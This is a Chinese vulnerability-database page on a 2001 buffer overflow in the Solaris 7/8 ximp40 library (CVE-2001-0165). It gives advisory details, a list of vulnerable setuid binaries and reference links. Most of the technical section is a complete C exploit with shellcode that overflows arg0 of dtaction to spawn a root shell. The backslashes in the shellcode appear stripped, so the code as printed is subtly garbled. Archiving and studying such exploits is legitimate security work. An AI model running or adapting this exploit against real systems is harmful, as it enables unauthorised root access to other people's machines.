Solaris 7和Solaris 8缓冲区溢出漏洞

Solaris 7和Solaris 8缓冲区溢出漏洞

漏洞ID 1106193 漏洞类型 缓冲区溢出
发布时间 2001-01-31 更新时间 2005-10-12
图片[1]-Solaris 7和Solaris 8缓冲区溢出漏洞-安全小百科CVE编号 CVE-2001-0165
图片[2]-Solaris 7和Solaris 8缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200105-024
漏洞平台 Solaris CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/20603
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200105-024
|漏洞详情
Solaris7和Solaris8中的ximp40共享库存在缓冲区溢出漏洞。本地用户可以借助超长”arg0″(进程名称)参数提升权限。
|漏洞EXP
source: http://www.securityfocus.com/bid/2322/info

Solaris is a variant of the UNIX Operating System, maintained and distributed by Sun Microsystems. It is freely available, with source code available.

A problem in the ximp40 library packaged with Openwin could allow a user to gain elevated privileges. Due to a problem with the handling of input by the programs linked against ximp40.so.2, it is possible to supply a long string, approximately 272 bytes, to the arg0 of the command, which will overwrite stack variables, including the return address of the program.

This makes it possible for a malicious user with local access to the system to execute arbitrary code, and depending upon which SUID binary is exploited, gain either EUID mail, or EUID root. Programs linked against the library that have been reported as vulnerable are:

*Solaris 8
suid root : /usr/dt/bin/dtaction
suid root : /usr/dt/bin/dtprintinfo
suid root : /usr/openwin/bin/sys-suspend
sgid mail : /usr/dt/bin/dtmail
sgid mail : /usr/openwin/bin/mailtool

*Solaris 7
suid root : /usr/dt/bin/dtaction
suid root : /usr/dt/bin/dtprintinfo
suid root : /usr/dt/bin/dtappgather
suid root : /usr/bin/admintool
suid root : /usr/openwin/bin/sys-suspend
sgid mail : /usr/dt/bin/dtmail
sgid mail : /usr/openwin/bin/mailtool

/*====================================================================
   Solaris ximp40 shared library exploit for Solaris8 Intel Edition
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by UNYUN ([email protected])
   [usage]
    #xhost +targethost
    #telnet targethost
    ...
    %setenv DISPLAY yourhost:0.0
    %gcc ximp40.c
    %./a.out
    0:Default value 1:Calculated value > 1   <- Input 0 or 1
  ====================================================================
*/

#include  <stdio.h>

#define     BUF_SIZE        272
#define     EIP_OFFSET      260
#define     FAKE_OFFSET     264
#define     FAKE_VALUE      0x08046dec
#define     EIP_VALUE       0x08047cb4
#define     FAKE_VALUE_DIF  0xd9c
#define     EIP_VALUE_DIF   0x12c
#define     NOP             0x90

char    shell_code[]=
  "xebx3bx9axffxffxffxffx07xffxc3x5ex31xc0x89x46xc1"
  "x88x46xc6x88x46x07x89x46x0cx31xc0x50xb0x17xe8xdf"
  "xffxffxffx83xc4x04x31xc0x50x8dx5ex08x53x8dx1ex89"
  "x5ex08x53xb0x3bxe8xc8xffxffxffx83xc4x0cxe8xc8xff"
  "xffxffx2fx62x69x6ex2fx73x68xffxffxffxffxffxffxff"
  "xffxff";

unsigned long get_sp(void)
{
  __asm__(" movl %esp,%eax ");
}

void valset(char *p,unsigned int val)
{
    *p=val&0xff;
    *(p+1)=(val>>8)&0xff;
    *(p+2)=(val>>16)&0xff;
    *(p+3)=(val>>24)&0xff;
}

main()
{
    char            buf[BUF_SIZE];
    unsigned int    esp=get_sp(),sw;

    memset(buf,NOP,BUF_SIZE);
    memcpy(buf+EIP_OFFSET-strlen(shell_code),shell_code,
           strlen(shell_code));

    printf("esp=%xn",esp);
    printf("0:Default value 1:Calculated value >");
    fflush(stdout);
    scanf("%d",&sw);
    if (sw==0){
        valset(buf+FAKE_OFFSET, FAKE_VALUE);
        valset(buf+EIP_OFFSET , EIP_VALUE);
        printf("Jumping address = %xn",EIP_VALUE);
    }else{
        valset(buf+FAKE_OFFSET, esp-FAKE_VALUE_DIF);
        valset(buf+EIP_OFFSET , esp+EIP_VALUE_DIF);
        printf("Jumping address = %xn",esp+EIP_VALUE_DIF);
    }
    buf[BUF_SIZE-1]=0;

    execl("/usr/dt/bin/dtaction",buf,NULL);
}
|参考资料

来源:XF
名称:solaris-ximp40-bo
链接:http://xforce.iss.net/static/6039.php
来源:BID
名称:2322
链接:http://www.securityfocus.com/bid/2322
来源:BUGTRAQ
名称:20010131[SPSadvisory#40]Solaris7/8ximp40sharedlibrarybufferoverflow
链接:http://archives.neohapsis.com/archives/bugtraq/2001-01/0517.html

相关推荐: Cisco IOS/700 Router Password Buffer Overflow

Cisco IOS/700 Router Password Buffer Overflow 漏洞ID 1104986 漏洞类型 Boundary Condition Error 发布时间 1997-12-15 更新时间 1997-12-15 CVE编号 N/A…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享